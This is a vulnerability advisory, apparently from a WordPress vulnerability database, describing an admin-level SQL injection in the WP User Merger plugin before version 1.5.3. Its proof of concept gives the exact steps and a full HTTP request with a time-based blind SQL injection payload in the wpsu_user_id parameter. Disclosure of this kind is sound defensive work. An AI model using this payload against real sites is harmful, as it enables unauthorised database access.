WordPress Plugin Vulnerabilities
WP User Merger < 1.5.3 - Admin+ SQLi via wpsu_user_id
Description
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as admin
Proof of Concept
As admin, go to the plugin's settings (Users > WP User Merger), Optional tab and enable the "Make User List Searchable (AJAX Based)" option. Reload the settings and go to the "DB User Merger" tab, search for a user, intercept the request made with the action=wpsu_get_user_assets parameter and change the wpsu_user_id parameter with the following payload -1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(7)))hlAf) Example: POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 111 Connection: close Cookie: [admin+] action=wpsu_get_user_assets&wpsu_user_id=-1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(7)))hlAf)&wpsu_nonce=4afb1e4faa This will result in a delayed request
Affects Plugins
Fixed in version 1.5.3
References
Classification
Miscellaneous
Original Researcher
Kunal Sharma (University of Kaiserslautern), Daniel Krohmer (Fraunhofer IESE)
Submitter
Kunal Sharma
Submitter website
Verified
Yes
Timeline
Publicly Published
2022-11-07 (about 4 months ago)
Added
2022-11-07 (about 4 months ago)
Last Updated
2022-12-02 (about 3 months ago)